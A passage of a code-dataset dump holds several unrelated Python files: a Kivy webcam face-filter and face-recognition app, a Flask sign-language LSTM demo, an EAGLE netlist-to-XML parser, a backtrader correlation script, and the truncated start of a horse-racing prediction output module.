image_resize(glasses.copy(), width=ew)\n\n gw, gh, gc = glasses2.shape\n for i in range(0, gw):\n for j in range(0, gh):\n if glasses2[i, j][3] != 0: # alpha 0\n roi_color[ey + i, ex + j] = glasses2[i, j]\n\n\n nose = nose_cascade.detectMultiScale(roi_gray, scaleFactor=1.2, minNeighbors=20)\n for (nx, ny, nw, nh) in nose:\n roi_nose = roi_gray[ny: ny + nh, nx: nx + nw]\n mustache2 = image_resize(mustache.copy(), width=nw)\n\n mw, mh, mc = mustache2.shape\n for i in range(0, mw):\n for j in range(0, mh):\n if mustache2[i, j][3] != 0: # alpha 0\n roi_color[ny + int(nh/2.0) + i, nx + j] = mustache2[i, j]\n\n # Display the resulting frame\n frame = cv.cvtColor(frame, cv.COLOR_BGRA2BGR)\n\n #convert frame to texture\n buf = cv.flip(frame, 0)\n buf = buf.tobytes()\n\n texture1 = Texture.create(size=(frame.shape[1], frame.shape[0]), colorfmt='bgr') \n texture1.blit_buffer(buf, colorfmt='bgr', bufferfmt='ubyte')\n\n # display frame from the texture\n self.ids.cam.texture = texture1 \n\n def detect_faces(self, dt):\n # apply detect faces feature\n\n ret, frame = self.capture.read()\n frame = cv.resize(frame, (1090, 720), interpolation = cv.INTER_AREA)\n gray = cv.cvtColor(frame, cv.COLOR_BGR2GRAY)\n faces = face_cascade.detectMultiScale(gray,\n scaleFactor=1.1,\n minNeighbors=10,\n minSize=(100, 100),\n flags=cv.CASCADE_SCALE_IMAGE)\n\n for (x,y,w,h) in faces:\n cv.rectangle(frame,(x,y),(x+w,y+h),(255,0,0),2)\n\n buf = cv.flip(frame, 0)\n buf = buf.tobytes()\n texture_f = Texture.create(size=(frame.shape[1], frame.shape[0]), colorfmt='bgr')\n texture_f.blit_buffer(buf, colorfmt='bgr', bufferfmt='ubyte')\n # display image from the texture\n self.ids.cam.texture = texture_f\n\n def identify_faces(self, dt):\n # Apply identify faces feature\n\n ret, frame = self.capture.read()\n frame = cv.resize(frame, (1090, 720), interpolation = cv.INTER_AREA)\n gray = cv.cvtColor(frame, cv.COLOR_BGR2GRAY)\n faces = face_cascade.detectMultiScale(gray,\n scaleFactor=1.1,\n minNeighbors=10,\n minSize=(100, 100),\n flags=cv.CASCADE_SCALE_IMAGE)\n rgb = cv.cvtColor(frame, cv.COLOR_BGR2RGB)\n # the facial embeddings for face in input\n encodings = face_recognition.face_encodings(rgb)\n names = []\n\n for encoding in encodings:\n matches = face_recognition.compare_faces(faces_data[\"encodings\"], encoding)\n name = \"Unknown\"\n\n if True in matches:\n #Find positions at which we get True and store them\n matched_idxs = [i for (i, b) in enumerate(matches) if b]\n counts = {}\n # loop over the matched indexes and maintain a count for each recognized face face\n for i in matched_idxs:\n #Check the names at respective indexes we stored in matched_idxs\n name = faces_data[\"names\"][i]\n #increase count for the name we got\n counts[name] = counts.get(name, 0) + 1\n #set name which has highest count\n name = max(counts, key=counts.get)\n \n # update the list of names\n names.append(name)\n # loop over the recognized faces\n for (x, y, w, h), name in zip(faces, names):\n # draw the predicted face name on the image\n cv.rectangle(frame, (x, y),(x+w, y+h),(0,255,0),2)\n cv.rectangle(frame, (x-10, y+h),(x+w+10, y+int(h*1.15)),(0,255,0), -1)\n cv.putText(frame, name, (x-5, y+int(h*1.11)), cv.FONT_HERSHEY_SIMPLEX, w/250, (255, 255, 255), 2)\n\n buf = cv.flip(frame, 0)\n buf = buf.tobytes()\n texture_f = Texture.create(size=(frame.shape[1], frame.shape[0]), colorfmt='bgr') \n texture_f.blit_buffer(buf, colorfmt='bgr', bufferfmt='ubyte')\n # display image from the texture\n self.ids.cam.texture = texture_f \n\n def capture_screen(self):\n # capture screen frame to gallery\n\n ret, frame = self.capture.read()\n DIR = './gallery'\n images = [name for name in os.listdir(DIR) if os.path.isfile(os.path.join(DIR, name))]\n count = len(images)\n while 'capture{}.jpg'.format(count) in images:\n count+=1\n cv.imwrite('gallery/capture{}.jpg'.format(count), frame)\n\n def painter(self, dt):\n # apply painter feature\n\n ret, frame = self.capture.read()\n frame = cv.resize(frame, (1090, 720), interpolation = cv.INTER_AREA)\n frame_w, frame_h, _ = frame.shape\n frame = cv.flip(frame, 1) #Mirror\n hsv = cv.cvtColor(frame, cv.COLOR_BGR2HSV)\n\n # Add the coloring options to the frame\n center_x, center_y = int(frame_w/2.5), int(frame_h/15)\n radius = 60\n space = 2*radius + 40\n\n #Clear button\n cv.circle(frame, (center_x, center_y), radius, colors[6], -1)\n cv.putText(frame, \"CLEAR\", (center_x-radius+20, center_y+10), font, .8, colors[4], 2)\n\n #Blue button\n cv.circle(frame, (center_x+space, center_y), radius, colors[0], -1)\n cv.putText(frame, \"BLUE\", (center_x+space-radius+25, center_y+10), font, .8, colors[4], 2)\n\n #Green button\n cv.circle(frame, (center_x+2*space, center_y), radius, colors[1], -1)\n cv.putText(frame, \"GREEN\", (center_x+2*space-radius+20, center_y+10), font, .8, colors[4], 2)\n\n #Red button\n cv.circle(frame, (center_x+3*space, center_y), radius, colors[2], -1)\n cv.putText(frame, \"RED\", (center_x+3*space-radius+35, center_y+10), font, .8, colors[4], 2)\n\n # Determine which pixels fall within the blue boundaries and then blur the binary image\n blue_mask = cv.inRange(hsv, blue_lower, blue_upper)\n blue_mask = cv.erode(blue_mask, kernel, iterations=2)\n blue_mask = cv.morphologyEx(blue_mask, cv.MORPH_OPEN, kernel)\n blue_mask = cv.dilate(blue_mask, kernel, iterations=1)\n\n # Find contours in the image\n cnts, _ = cv.findContours(blue_mask.copy(), cv.RETR_EXTERNAL, cv.CHAIN_APPROX_SIMPLE)\n center = None\n\n # Check to see if any contours were found\n if len(cnts) > 0:\n \t # Sort the contours and find the largest one -- we\n \t # will assume this contour correspondes to the area of the bottle cap\n cnt = sorted(cnts, key = cv.contourArea, reverse = True)[0]\n # Get the radius of the enclosing circle around the found contour\n ((x, y), radius) = cv.minEnclosingCircle(cnt)\n # Draw the circle around the contour\n cv.circle(frame, (int(x), int(y)), int(radius), colors[3], 2)\n # Get the moments to calculate the center of the contour (in this case Circle)\n M = cv.moments(cnt)\n center = (int(M['m10'] / M['m00']), int(M['m01'] / M['m00']))\n \n global bpoints, gpoints, rpoints, bindex, gindex, rindex, colorIndex\n if center_y-radius <= center[1] <= center_y+radius:\n if center_x-radius <= center[0] <= center_x+radius: # Clear All\n bpoints = [deque(maxlen=512)]\n gpoints = [deque(maxlen=512)]\n rpoints = [deque(maxlen=512)]\n\n bindex = 0\n gindex = 0\n rindex = 0\n\n elif center_x+space-radius <= center[0] <= center_x+space+radius:\n colorIndex = 0 # Blue\n elif center_x+2*space-radius <= center[0] <= center_x+2*space+radius:\n colorIndex = 1 # Green\n elif center_x+3*space-radius <= center[0] <= center_x+3*space+radius:\n colorIndex = 2 # Red\n else :\n if colorIndex == 0:\n bpoints[bindex].appendleft(center)\n elif colorIndex == 1:\n gpoints[gindex].appendleft(center)\n elif colorIndex == 2:\n rpoints[rindex].appendleft(center)\n\n # Append the next deque when no contours are detected (i.e., bottle cap reversed)\n else:\n bpoints.append(deque(maxlen=512))\n bindex += 1\n gpoints.append(deque(maxlen=512))\n gindex += 1\n rpoints.append(deque(maxlen=512))\n rindex += 1\n\n # Draw lines of all the colors (Blue, Green and Red)\n points = [bpoints, gpoints, rpoints]\n for i in range(len(points)):\n for j in range(len(points[i])):\n for k in range(1, len(points[i][j])):\n if points[i][j][k - 1] is None or points[i][j][k] is None:\n continue\n cv.line(frame, points[i][j][k - 1], points[i][j][k], colors[i], 2)\n\n buf = cv.flip(frame, 0)\n buf = buf.tobytes()\n texture_f = Texture.create(size=(frame.shape[1], frame.shape[0]), colorfmt='bgr')\n texture_f.blit_buffer(buf, colorfmt='bgr', bufferfmt='ubyte')\n # display image from the texture\n self.ids.cam.texture = texture_f\n \n def update_faces_data(self):\n get_faces_data(\"ab\")\n\nkv = Builder.load_file(\"screens.kv\")\n\nclass FaceAPP(App):\n def build(self):\n Window.size = (1115, 540)\n Window.minimum_width = 1115\n Window.minimum_height = 540\n #Window.clearcolor = (.7, .7, .7, 1)\n #Window.borderless = \"1\"\n #Window.fullscreen = 'fake'\n #Window.set_system_cursor('size_we')\n Window.softinput_mode = 'resize'\n return kv\n\nFaceAPP().run()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":14031,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"67525214","text":"from flask import Flask,render_template,Response,request\nimport cv2\nimport time\nimport sys\n\nimport numpy as np\nimport os\nfrom matplotlib import pyplot as plt\nimport mediapipe as mp\n\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.layers import LSTM, Dense\n#from tensorflow.keras.callbacks import TensorBoard\n\nsys.path.append('./mediapipe_functions.py')\nfrom mediapipe_functions import mediapipe_detection, draw_landmarks, draw_styled_landmarks, extract_keypoints\n\nvideo_id = 'no'\n\napp=Flask(__name__)\n\n@app.route('/', methods=['GET', 'POST'])\ndef index():\n\n if request.method == 'POST':\n if request.form.get('LSTM_model') == 'start_detection':\n #print('hello123')\n video_id = 'lstm'\n \"\"\"Video streaming home page.\"\"\"\n return render_template('index.html')\n\n\n# Use Holistic Models for detections\nmp_holistic = mp.solutions.holistic # Holistic model\nmp_drawing = mp.solutions.drawing_utils # Drawing utilities\n\n'''\n# Make keypoint detection, model can only detect in RGB\ndef mediapipe_detection(image, model):\n image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB) # COLOR CONVERSION BGR 2 RGB as model can only detect in RGB\n image.flags.writeable = False # Image is no longer writeable\n results = model.process(image) # Use Model to make prediction\n image.flags.writeable = True # Image is now writeable \n image = cv2.cvtColor(image, cv2.COLOR_RGB2BGR) # COLOR COVERSION RGB 2 BGR\n return image, results\n\ndef draw_landmarks(image, results): # draw landmarks for each image/frame\n mp_drawing.draw_landmarks(image, results.face_landmarks, mp_holistic.FACEMESH_CONTOURS) # Draw face connections\n mp_drawing.draw_landmarks(image, results.pose_landmarks, mp_holistic.POSE_CONNECTIONS) # Draw pose connections\n mp_drawing.draw_landmarks(image, results.left_hand_landmarks, mp_holistic.HAND_CONNECTIONS) # Draw left hand connections\n mp_drawing.draw_landmarks(image, results.right_hand_landmarks, mp_holistic.HAND_CONNECTIONS) # Draw right hand connections\n \n \ndef draw_styled_landmarks(image, results): # draw landmarks for each image/frame, fix colour of landmark drawn\n # Draw face connections\n mp_drawing.draw_landmarks(image, results.face_landmarks, mp_holistic.FACEMESH_CONTOURS, \n mp_drawing.DrawingSpec(color=(80,110,10), thickness=1, circle_radius=1), \n mp_drawing.DrawingSpec(color=(80,256,121), thickness=1, circle_radius=1)\n ) \n # Draw pose connections\n mp_drawing.draw_landmarks(image, results.pose_landmarks, mp_holistic.POSE_CONNECTIONS,\n mp_drawing.DrawingSpec(color=(80,22,10), thickness=2, circle_radius=2), \n mp_drawing.DrawingSpec(color=(80,44,121), thickness=2, circle_radius=1)\n ) \n # Draw left hand connections\n mp_drawing.draw_landmarks(image, results.left_hand_landmarks, mp_holistic.HAND_CONNECTIONS, \n mp_drawing.DrawingSpec(color=(121,22,76), thickness=2, circle_radius=2), \n mp_drawing.DrawingSpec(color=(121,44,250), thickness=2, circle_radius=1)\n ) \n # Draw right hand connections \n mp_drawing.draw_landmarks(image, results.right_hand_landmarks, mp_holistic.HAND_CONNECTIONS, \n mp_drawing.DrawingSpec(color=(245,117,66), thickness=2, circle_radius=2), \n mp_drawing.DrawingSpec(color=(245,66,230), thickness=2, circle_radius=1)\n ) \n'''\n# define extract keypoint function\ndef extract_keypoints(results):\n pose = np.array([[res.x, res.y, res.z, res.visibility] for res in results.pose_landmarks.landmark]).flatten() if results.pose_landmarks else np.zeros(33*4)\n face = np.array([[res.x, res.y, res.z] for res in results.face_landmarks.landmark]).flatten() if results.face_landmarks else np.zeros(468*3)\n lh = np.array([[res.x, res.y, res.z] for res in results.left_hand_landmarks.landmark]).flatten() if results.left_hand_landmarks else np.zeros(21*3)\n rh = np.array([[res.x, res.y, res.z] for res in results.right_hand_landmarks.landmark]).flatten() if results.right_hand_landmarks else np.zeros(21*3)\n return np.concatenate([pose, face, lh, rh]) # concatenate all the keypoints that are flattened\n\n\n# Actions that we try to detect\n#actions = np.array(['hello', 'thanks', 'iloveyou'])\nactions = np.array(['Alligator','Butterfly','Cow','Elephant','Gorilla'])\n\nlabel_map = {label:num for num, label in enumerate(actions)} #create label map dictionary\n\nmodel = Sequential()\nmodel.add(LSTM(64, return_sequences=True, activation='relu', input_shape=(30,1662))) #each video has input shape of 30 frames of 1662 keypoints: X.shape\nmodel.add(LSTM(128, return_sequences=True, activation='relu'))\nmodel.add(LSTM(64, return_sequences=False, activation='relu')) #next layer is a dense layer so we do not return sequences here\nmodel.add(Dense(64, activation='relu'))\nmodel.add(Dense(32, activation='relu'))\nmodel.add(Dense(actions.shape[0], activation='softmax'))\n\nmodel.compile(optimizer='Adam', loss='categorical_crossentropy', metrics=['categorical_accuracy'])\n\nprint('Loading Model...')\n#model.load_weights('./models/first_model_action.h5')\n#model.load_weights('./models/animal_asl_5_classes_1000_epoch_action.h5')\nmodel.load_weights('./models/Epoch-144-Loss-0.53.h5')\nprint('Model Loaded!')\n\ncolors = [(245,221,173), (245,185,265), (146,235,193),(204,152,295),(255,217,179)]\ndef prob_viz(res, actions, input_frame, colors):\n output_frame = input_frame.copy()\n for num, prob in enumerate(res):\n cv2.rectangle(output_frame, (0,60+num*40), (int(prob*100), 90+num*40), colors[num], -1) #change length of bar depending on probability\n cv2.putText(output_frame, actions[num]+' '+str(round(prob*100,2))+'%', (0, 85+num*40), cv2.FONT_HERSHEY_SIMPLEX, 0.6, (0,0,0), 1, cv2.LINE_AA)\n #cv2.putText(image, text, org, font, fontScale, color[, thickness[, lineType[, bottomLeftOrigin]]])\n return output_frame\n\n\ndef gen():\n # 1. New detection variables\n sequence = []\n sentence = []\n predictions = []\n threshold = 0.5\n \"\"\"Video streaming generator function.\"\"\"\n cap = cv2.VideoCapture(0)\n sent =''\n \n with mp_holistic.Holistic(min_detection_confidence=0.5, min_tracking_confidence=0.5) as holistic:\n # Read until video is completed\n while(cap.isOpened()):\n # Capture frame-by-frame\n ret, image = cap.read()\n if ret == True:\n #img = cv2.resize(img, (0,0), fx=0.5, fy=0.5) \n\n # Make detections\n image, results = mediapipe_detection(image, holistic)\n #print(results)\n\n # Draw landmarks\n draw_styled_landmarks(image, results)\n\n\n # 2. Prediction logic\n keypoints = extract_keypoints(results)\n sequence.append(keypoints)\n sequence = sequence[-30:]\n \n if len(sequence) == 30:\n res = model.predict(np.expand_dims(sequence, axis=0))[0]\n #print(actions[np.argmax(res)])\n predictions.append(np.argmax(res))\n \n #3. Viz logic\n if np.unique(predictions[-10:])[0]==np.argmax(res): \n if res[np.argmax(res)] > threshold: \n \n if len(sentence) > 0: \n # if action is not in the last sentence, then we append the last action to the sentence\n if actions[np.argmax(res)] != sentence[-1]: \n sentence.append(actions[np.argmax(res)])\n else:\n sentence.append(actions[np.argmax(res)])\n\n if len(sentence) > 5: \n sentence = sentence[-5:]\n \n # Viz probabilities\n image = prob_viz(res, actions, image, colors)\n \n cv2.rectangle(image, (0,0), (700, 40), (0, 60, 123), -1)\n cv2.putText(image, ' '.join(sentence), (3,30), cv2.FONT_HERSHEY_SIMPLEX, 1, (255, 255, 255), 2, cv2.LINE_AA)\n\n\n #encode output image to bytes\n frame = cv2.imencode('.jpg', image)[1].tobytes()\n\n yield (b'--frame\\r\\n'b'Content-Type: image/jpeg\\r\\n\\r\\n' + frame + b'\\r\\n')\n #time.sleep(0.1)\n\n else: \n break\n\n@app.route('/video_feed')\ndef video_feed():\n \"\"\"Video streaming route. Put this in the src attribute of an img tag.\"\"\"\n\n return Response(gen(),\n mimetype='multipart/x-mixed-replace; boundary=frame')\n\n\n\n\n\nif __name__==\"__main__\":\n app.run(debug=True)","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":8998,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"443531523","text":"'''\nCreated on Feb 13, 2015\n\n@author: Max Ruiz\n'''\nimport tkFileDialog as tf\nimport tkFileDialog\nimport xml.etree.ElementTree as ET\nimport re\n\n#Generic file IO\nclass FileManip():\n def __init__(self):\n self.fileOptions()\n\n def fileOptions(self):\n self.fopt = file_opt = {}\n file_opt['defaultextension'] = '.csv'\n file_opt['filetypes'] = [('Comma Separated Values', '.csv'), ('Excel', '.xlsx'), ('All Files', '.*')]\n file_opt['initialdir'] = 'C:\\\\'\n file_opt['multiple'] = False\n file_opt['title'] = 'File'\n\n def openFile(self):\n return tf.askopenfile(mode = 'r', **self.fopt)\n\n def openFilename(self):\n return tf.askopenfilename(**self.fopt)\n\n def saveFile(self):\n return tf.asksaveasfile(mode = 'w', **self.fopt)\n\n def saveFilename(self):\n return tf.asksaveasfilename(**self.fopt)\n\n def getDirectory(self):\n return tf.askdirectory(**self.fopt)\n\n def extendFileOptions(self, xopts={}):\n for opt in xopts:\n try:\n self.fopt[opt] = xopts[opt]\n except:\n # poor/bad option\n pass\n\n# Net Checker specific file IO\nclass HandleFile():\n def __init__(self):\n self.fileOptions()\n self.netList = {}\n self.nets = []\n self.fName = ''\n\n def fileOptions(self):\n self.fopen = file_opt = {}\n file_opt['defaultextension'] = '.txt'\n file_opt['filetypes'] = [('Text File', '.txt'), ('All Files', '.*')]\n file_opt['initialdir'] = 'C:\\\\'\n file_opt['multiple'] = False\n file_opt['title'] = 'Select Net List Text File'\n\n def openUsrFile(self):\n fileDir = tf.askopenfilename(**self.fopen)\n # Must parse loaded file because it comes as the whole directory instead of just the file.\n fileName = re.findall(r'/([\\w]+\\.txt)', fileDir)\n try:\n self.fName = fileName[0]\n except:\n self.fName = 'Could not parse file name.'\n try:\n\n self.file = open(fileDir, 'r')\n self.parseNetList()\n return 'File loaded: ' + self.fName # success message\n except:\n return 'Please open a file to continue' # error message\n\n def parseNetList(self):\n netName = ''\n parts = []\n done = False\n\n for row in self.file:\n line = row.split()\n lenLine = len(line)\n # The EAGLE net list has bogus lines it generates with the actual net list\n # This will filter out the bogus lines.\n # The format for the EAGLE net list is:\n # Trace Part Pad Pin Sheet\n # Part Pad Pin Sheet\n # . . . .\n if lenLine > 1 and lenLine < 6 and line[0] != 'Net':\n if lenLine > 4:\n if done:\n self.netList[netName] = parts\n self.nets.append(netName)\n parts = []\n\n netName = line[0]\n line.remove(netName) # The first element in the array greater than 4 is\n # removed because it follows a difference pattern\n # than subsequent entries and it is to be separated\n # from the rest of the data until the end\n # when everything is stored in a dictionary under\n # that trace name\n\n parts.append(line)\n done = True\n\n self.file.close()\n\n def saveFileToXML(self):\n try: # This will catch the error caused by no file loaded yet\n\n self.xmlFileName = self.fName.replace('.txt', '.xml')\n\n try: # This will catch the error based on the XML file not having been created yet\n nlt = ET.parse(self.xmlFileName)\n netroot = nlt.getroot()\n netroot.clear()\n except:\n n = ET.Element('Netlist')\n tree = ET.ElementTree(n)\n tree.write(self.xmlFileName)\n nlt = ET.parse(self.xmlFileName)\n netroot = nlt.getroot()\n\n for net in self.nets:\n trace = ET.SubElement(netroot, 'Trace')\n trace.set('TName', net)\n\n for parts in self.netList[net]:\n part = ET.SubElement(trace, 'Part')\n part.set('PName', parts[0])\n\n pad = ET.SubElement(part, 'Pad')\n pad.text = str(parts[1])\n pin = ET.SubElement(part, 'Pin')\n pin.text = str(parts[2])\n sheet = ET.SubElement(part, 'Sheet')\n sheet.text = str(parts[3])\n\n nlt.write(self.xmlFileName)\n return 'XML file has been saved as ' + self.xmlFileName # success message\n\n except:\n return 'Please open a net list text file first.' # error message\n\n def getNets(self):\n return self.nets\n\n def getNetlist(self):\n return self.netList\n\n def getFName(self):\n return self.fName\n","sub_path":"FileCommands.py","file_name":"FileCommands.py","file_ext":"py","file_size_in_byte":5094,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"129621575","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Nov 28 11:49:50 2017\r\n\r\n@author: junbai\r\n\r\nEU and CN HRC Index Pair \r\n\"\"\"\r\n\r\nfrom __future__ import (absolute_import, division, print_function,\r\n unicode_literals)\r\n\r\n# Reference\r\n# https://estrategiastrading.com/oro-bolsa-estadistica-con-python/\r\n\r\nimport datetime\r\nimport pandas as pd\r\n\r\nimport scipy.stats\r\n\r\nimport backtrader as bt\r\n\r\n\r\nclass PearsonR(bt.ind.PeriodN):\r\n _mindatas = 2 # hint to the platform\r\n\r\n lines = ('correlation',)\r\n params = (('period', 20),)\r\n\r\n def next(self):\r\n c, p = scipy.stats.pearsonr(self.data0.get(size=self.p.period),\r\n self.data1.get(size=self.p.period))\r\n\r\n self.lines.correlation[0] = c\r\n\r\n\r\nclass MACrossOver(bt.Strategy):\r\n params = (\r\n ('ma', bt.ind.MovAv.SMA),\r\n ('pd1', 20),\r\n ('pd2', 20),\r\n )\r\n\r\n def __init__(self):\r\n ma1 = self.p.ma(self.data0, period=self.p.pd1, subplot=True)\r\n self.p.ma(self.data1, period=self.p.pd2, plotmaster=ma1)\r\n PearsonR(self.data0, self.data1)\r\n\r\n\r\ndef runstrat(args=None):\r\n\r\n cerebro = bt.Cerebro()\r\n\r\n df = pd.read_csv(\"C:/Users/j291414/Desktop/data.csv\")\r\n df.index = pd.to_datetime(df['Date'], format=\"%d/%m/%Y\")\r\n df0 = pd.DataFrame({'close':df['EU']})\r\n df1 = pd.DataFrame({'close':df['CN']})\r\n data0 = bt.feeds.PandasData(dataname=df0)\r\n data1 = bt.feeds.PandasData(dataname=df1)\r\n data1.plotinfo.plotmaster = data0\r\n cerebro.adddata(data0)\r\n cerebro.adddata(data1)\r\n\r\n\r\n\r\n # Strategy\r\n cerebro.addstrategy(MACrossOver)\r\n\r\n cerebro.addobserver(bt.observers.LogReturns2,\r\n timeframe=bt.TimeFrame.Weeks,\r\n compression=20)\r\n\r\n # Execute\r\n cerebro.run()\r\n\r\n cerebro.plot()\r\n \r\nrunstrat()","sub_path":"my algorithms/quant_trading/backtrader/samples/pairs/HRC_index_pair.py","file_name":"HRC_index_pair.py","file_ext":"py","file_size_in_byte":1846,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"268259212","text":"command_list = {\r\n 'hello' : 'hello!',\r\n 'gm' : 'gm!',\r\n 'gn' : 'good night😴'\r\n}\r\n\r\ncommand_question = ['hello' , 'gm' , 'gn']\r\n\r\nrandom_reply_list = [\r\n'☃️do you want to build a snowman?☃️',\r\n'very chilly',\r\n'❄️xue hua piao piao❄️', \r\n'hello world!',\r\n'mmm yum',\r\n';-;',\r\n'eheu!',\r\n'hello there!',\r\n\r\n] ","sub_path":"snowbot_commands.py","file_name":"snowbot_commands.py","file_ext":"py","file_size_in_byte":332,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"614512850","text":"from modules.extract import Extract\nfrom modules.transform import Transform\nfrom modules.simulation import Simulation\nimport modules.util as mu\n\nimport slackweb\nimport pandas as pd\nimport my_config as mc\nimport os\nfrom datetime import datetime as dt\nfrom datetime import timedelta\nimport glob\n\nclass Output(object):\n slack_operation_url = mc.SLACK_operation_webhook_url\n slack_summary_url = mc.SLACK_summary_webhook_url\n slack_realtime_url = mc.SLACK_realtime_webhook_url\n kaime_columns = [\"RACE_ID\", \"エリア\", \"券種\", \"購入金額\", \"目1\", \"目2\", \"目3\"]\n\n def __init__(self, start_date, end_date, term_start_date, term_end_date, test_flag, target_sr, cond_df):\n self.start_date = start_date\n self.end_date = end_date\n self.term_start_date = term_start_date\n self.term_end_date = term_end_date\n mock_flag = False\n self.ext = Extract(start_date, end_date, mock_flag)\n self.tf = Transform(start_date, end_date)\n self.dict_path = mc.return_jra_path(test_flag)\n self.pred_folder_path = self.dict_path + 'pred/'\n self.target_path = mc.return_target_path(test_flag)\n self.ext_score_path = self.target_path + 'ORIGINAL_DATA/'\n self.auto_bet_path = self.target_path + 'AUTO_BET/'\n self.for_pbi_path = self.target_path + 'pbi/'\n self._set_file_list()\n self._set_vote_condition(target_sr, cond_df)\n\n def _set_vote_condition(self, target_sr, cond_df):\n self.win_rate = target_sr[\"win_rate\"]\n self.jiku_rate = target_sr[\"jiku_rate\"]\n self.ana_rate = target_sr[\"ana_rate\"]\n print(f\"----- mark rate: win:{self.win_rate}% jiku:{self.jiku_rate}% ana:{self.ana_rate}%\")\n tansho_sr = cond_df.query(\"タイプ == '単勝'\")\n print(tansho_sr[\"オッズ条件\"])\n self.tansho_flag = False if tansho_sr.empty else True\n if self.tansho_flag:\n self.tansho_cond = tansho_sr[\"条件\"].values[0]\n self.tansho_odds_cond = tansho_sr[\"オッズ条件\"].values[0]\n fukusho_sr = cond_df.query(\"タイプ == '複勝'\")\n self.fukusho_flag = False if fukusho_sr.empty else True\n if self.fukusho_flag:\n self.fukusho_cond = fukusho_sr[\"条件\"].values[0]\n self.fukusho_odds_cond = fukusho_sr[\"オッズ条件\"].values[0]\n umaren_sr = cond_df.query(\"タイプ == '馬連'\")\n self.umaren_flag = False if umaren_sr.empty else True\n if self.umaren_flag:\n self.umaren1_cond = umaren_sr[\"条件\"].values[0][0]\n self.umaren2_cond = umaren_sr[\"条件\"].values[0][1]\n self.umaren_odds_cond = umaren_sr[\"オッズ条件\"].values[0]\n umatan_sr = cond_df.query(\"タイプ == '馬単'\")\n self.umatan_flag = False if umatan_sr.empty else True\n if self.umatan_flag:\n self.umatan1_cond = umatan_sr[\"条件\"].values[0][0]\n self.umatan2_cond = umatan_sr[\"条件\"].values[0][1]\n self.umatan_odds_cond = umatan_sr[\"オッズ条件\"].values[0]\n wide_sr = cond_df.query(\"タイプ == 'ワイド'\")\n self.wide_flag = False if wide_sr.empty else True\n if self.wide_flag:\n self.wide1_cond = wide_sr[\"条件\"].values[0][0]\n self.wide2_cond = wide_sr[\"条件\"].values[0][1]\n self.wide_odds_cond = wide_sr[\"オッズ条件\"].values[0]\n sanrenpuku_sr = cond_df.query(\"タイプ == '三連複'\")\n self.sanrenpuku_flag = False if sanrenpuku_sr.empty else True\n if self.sanrenpuku_flag:\n self.sanrenpuku1_cond = sanrenpuku_sr[\"条件\"].values[0][0]\n self.sanrenpuku2_cond = sanrenpuku_sr[\"条件\"].values[0][1]\n self.sanrenpuku3_cond = sanrenpuku_sr[\"条件\"].values[0][2]\n self.sanrenpuku_odds_cond = sanrenpuku_sr[\"オッズ条件\"].values[0]\n\n def _set_file_list(self):\n race_base_df = self.ext.get_race_before_table_base()[[\"RACE_KEY\", \"NENGAPPI\", \"距離\", \"芝ダ障害コード\", \"内外\", \"条件\"]]\n race_base_df.loc[:, \"RACE_ID\"] = race_base_df.apply(lambda x: mu.convert_jrdb_id(x[\"RACE_KEY\"], x[\"NENGAPPI\"]),\n axis=1)\n race_base_df.loc[:, \"file_id\"] = race_base_df[\"RACE_KEY\"].apply(lambda x: mu.convert_target_file(x))\n race_base_df.loc[:, \"nichiji\"] = race_base_df[\"RACE_KEY\"].apply(lambda x: mu.convert_kaiji(x[5:6]))\n race_base_df.loc[:, \"race_no\"] = race_base_df[\"RACE_KEY\"].str[6:8]\n race_base_df.loc[:, \"rc_file_id\"] = race_base_df[\"RACE_KEY\"].apply(lambda x: \"RC\" + x[0:5])\n race_base_df.loc[:, \"kc_file_id\"] = \"KC\" + race_base_df[\"RACE_KEY\"].str[0:6]\n\n update_term_df = race_base_df.query(f\"NENGAPPI >= '{self.term_start_date}' and NENGAPPI <= '{self.term_end_date}'\")\n print(race_base_df.shape)\n print(f\"NENGAPPI >= '{self.term_start_date}' and NENGAPPI <= '{self.term_end_date}'\")\n print(update_term_df.shape)\n self.race_base_df = race_base_df\n self.file_list = update_term_df[\"file_id\"].drop_duplicates()\n self.date_list = update_term_df[\"NENGAPPI\"].drop_duplicates()\n self.rc_file_list = update_term_df[\"rc_file_id\"].drop_duplicates()\n self.kc_file_list = update_term_df[\"kc_file_id\"].drop_duplicates()\n\n\n def get_pred_df(self, model_version, target):\n \"\"\" 予測したtargetのデータを取得する \"\"\"\n target_filelist = self._get_file_list_for_pred(model_version)\n df = pd.DataFrame()\n for filename in target_filelist:\n temp_df = pd.read_pickle(filename)\n df = pd.concat([df, temp_df])\n df = df.query(f\"target == '{target}'\")\n return df\n\n def _get_file_list_for_pred(self, folder):\n \"\"\" predで予測したファイルの対象リストを取得する\"\"\"\n folder_path = self.pred_folder_path + folder + \"/*.pkl\"\n filelist = glob.glob(folder_path)\n file_df = pd.DataFrame({\"filename\": filelist})\n file_df.loc[:, \"date\"] = file_df[\"filename\"].apply(lambda x: dt.strptime(x[-12:-4], '%Y%m%d'))\n target_filelist = file_df[(file_df[\"date\"] >= self.start_date) & (file_df[\"date\"] <= self.end_date)][\"filename\"].tolist()\n return sorted(target_filelist)\n\n def set_result_df(self):\n race_table_base_df = self.ext.get_race_table_base().drop([\"馬場状態\", \"target_date\", \"距離\", \"芝ダ障害コード\", \"頭数\"], axis=1)\n race_table_base_df.loc[:, \"RACE_ID\"] = race_table_base_df.apply(\n lambda x: mu.convert_jrdb_id(x[\"RACE_KEY\"], x[\"NENGAPPI\"]), axis=1)\n race_table_base_df.loc[:, \"file_id\"] = race_table_base_df[\"RACE_KEY\"].apply(lambda x: mu.convert_target_file(x))\n race_table_base_df.loc[:, \"nichiji\"] = race_table_base_df[\"RACE_KEY\"].apply(lambda x: mu.convert_kaiji(x[5:6]))\n race_table_base_df.loc[:, \"race_no\"] = race_table_base_df[\"RACE_KEY\"].str[6:8]\n raceuma_table_base_df = self.ext.get_raceuma_table_base()\n result_df = 